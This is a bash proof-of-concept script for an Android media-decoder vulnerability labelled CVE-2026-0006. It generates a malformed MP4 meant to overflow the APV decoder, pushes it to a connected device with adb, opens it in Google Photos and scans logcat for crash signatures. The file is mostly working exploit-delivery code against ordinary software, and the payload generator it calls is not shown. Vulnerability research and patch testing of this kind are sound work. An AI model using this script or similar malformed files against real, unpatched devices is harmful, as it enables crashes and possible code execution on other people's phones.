POC / deploy_exploit_mp4.sh SH
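#!/usr/bin/env bash
#
# CVE-2026-0006 — Generate, push, and open exploit MP4 on Android device
#
# Prerequisites:
#   - valid.apv and apv-mp4/valid_ffmpeg.mp4 in the same directory
#   - adb connected to an Android 16 device/emulator (pre-March 2026 patch)
#   - python3 available
#
# Usage:
#   ./deploy_exploit_mp4.sh
#
# Device selection:
#   The serial reported by `adb get-serialno` is captured once and every later
#   adb call is pinned to it with `-s`, so a device attached or detached while
#   the script runs cannot become the target. With several devices attached,
#   set ANDROID_SERIAL before running to choose one.
#
# Exit status:
#   0 when the run completes, whether or not a crash was observed;
#   non-zero when a prerequisite is missing or a required adb/python step fails.
#

set -euo pipefail

SCRIPT_DIR="$(cd -- "$(dirname -- "${BASH_SOURCE[0]}")" && pwd)"
readonly SCRIPT_DIR
readonly MP4_FILE="$SCRIPT_DIR/apv-mp4/overflow_auinfo.mp4"
readonly DEVICE_PATH="/sdcard/Download/overflow_auinfo.mp4"

# Fail early with a readable message instead of a bare "command not found"
# half-way through the run.
for tool in python3 adb; do
    if ! command -v "$tool" > /dev/null 2>&1; then
        echo "[-] Failed: required tool '$tool' not found in PATH" >&2
        exit 1
    fi
done

# Launch a VIEW intent for the pushed file on the pinned device.
# Arguments: extra `am start` options (e.g. -n <component>), may be empty.
# Returns:   exit status of `adb shell am start`; stderr is discarded because
#            callers treat the launch as best-effort and report failure themselves.
start_view_intent() {
    "${ADB[@]}" shell am start \
        -a android.intent.action.VIEW \
        -d "file://$DEVICE_PATH" \
        -t video/mp4 \
        "$@" \
        2>/dev/null
}

echo "[1/5] Generating exploit MP4..."
python3 "$SCRIPT_DIR/generate_overflow_mp4.py"

if [ ! -f "$MP4_FILE" ]; then
    echo "[-] Failed: $MP4_FILE not found" >&2
    exit 1
fi
# BSD wc pads its output with spaces; strip them so the message reads the
# same on every host.
MP4_SIZE=$(wc -c < "$MP4_FILE")
MP4_SIZE=${MP4_SIZE//[[:space:]]/}
echo "[+] Generated: $MP4_FILE ($MP4_SIZE bytes)"

echo "[2/5] Checking adb connection..."
adb wait-for-device
DEVICE=$(adb get-serialno)
if [ -z "$DEVICE" ] || [ "$DEVICE" = "unknown" ]; then
    echo "[-] Failed: could not determine the device serial" >&2
    exit 1
fi
readonly DEVICE
# All further adb traffic goes through this array so it always reaches the
# device that was just reported.
readonly ADB=(adb -s "$DEVICE")
echo "[+] Connected: $DEVICE"

# Record the patch level so a "no crash" result can be interpreted: the header
# states the test needs a pre-March 2026 patch level.
PATCH_LEVEL=$("${ADB[@]}" shell getprop ro.build.version.security_patch 2>/dev/null | tr -d '\r' || true)
echo "[+] Security patch level: ${PATCH_LEVEL:-unknown}"

echo "[3/5] Pushing to device..."
"${ADB[@]}" push "$MP4_FILE" "$DEVICE_PATH"

echo "[4/5] Triggering media scan and opening in Google Photos..."
# Clear the log buffer so anything matched below comes from this run.
"${ADB[@]}" logcat -c

"${ADB[@]}" shell am broadcast \
    -a android.intent.action.MEDIA_SCANNER_SCAN_FILE \
    -d "file://$DEVICE_PATH" > /dev/null

sleep 1

# Try the explicit Google Photos viewer first, then any handler registered for
# video/mp4, and finally ask the operator to open the file by hand.
start_view_intent -n com.google.android.apps.photos/.viewer.pager.IntentPhotoPagerActivity \
|| start_view_intent \
|| echo "[!] Could not auto-open — open Google Photos manually"

echo ""
echo "[5/5] Waiting for crash..."

CRASH=""
for attempt in 1 2 3; do
    sleep 5
    # grep exits 1 when nothing matches; `|| true` keeps set -e/pipefail from
    # ending the script on a quiet log. -E replaces the GNU-only `\|` syntax.
    CRASH=$("${ADB[@]}" logcat -d -s DEBUG:F \
        | grep -E -A 30 "signal 11|AddressSanitizer|SIGABRT|SIGSEGV" || true)

    if [ -n "$CRASH" ]; then
        echo ""
        echo "============================================"
        echo "  CRASH DETECTED (attempt $attempt)"
        echo "============================================"
        echo "$CRASH"
        echo "============================================"
        echo ""
        echo "[+] Full tombstone / logcat:"
        echo ""
        # The markers and decoder symbols in this filter are the ones this
        # script associates with the crash; the same strings are usable as
        # triage indicators when reviewing crash logs from other devices.
        # `head` closing the pipe early makes the upstream stages die with
        # SIGPIPE, which pipefail + set -e would turn into a script abort
        # right after a successful detection, hence the `|| true`.
        "${ADB[@]}" logcat -d \
            | grep -E "DEBUG|AddressSanitizer|heap-buffer-overflow|WRITE of size|SUMMARY|backtrace|blk_to_imgb|dec_thread|oapvd_decode|C2SoftApvDec|SEGV|signal 11|located.*bytes after" \
            | head -40 || true
        break
    fi

    if [ "$attempt" -lt 3 ]; then
        echo "[*] No crash yet (attempt $attempt/3), retriggering..."
        "${ADB[@]}" logcat -c
        "${ADB[@]}" shell am force-stop com.google.android.apps.photos 2>/dev/null || true
        sleep 1
        start_view_intent || true
    fi
done

if [ -z "$CRASH" ]; then
    # NOTE(review): no crash is presumably also the expected result on a build
    # that carries the fix — compare with the patch level printed in step 2.
    echo "[*] No crash after 3 attempts. Monitor manually:"
    echo "    adb logcat -s DEBUG:F | grep -A 30 'signal 11'"
    echo ""
    echo "[*] Or check for tombstones:"
    echo "    adb shell ls -lt /data/tombstones/ | head -5"
fi

# The pushed file stays in shared storage after the run; print the removal
# command so it does not linger on the test device.
echo ""
echo "[*] Test file remains on the device; remove it when finished:"
echo "    adb -s $DEVICE shell rm $DEVICE_PATH"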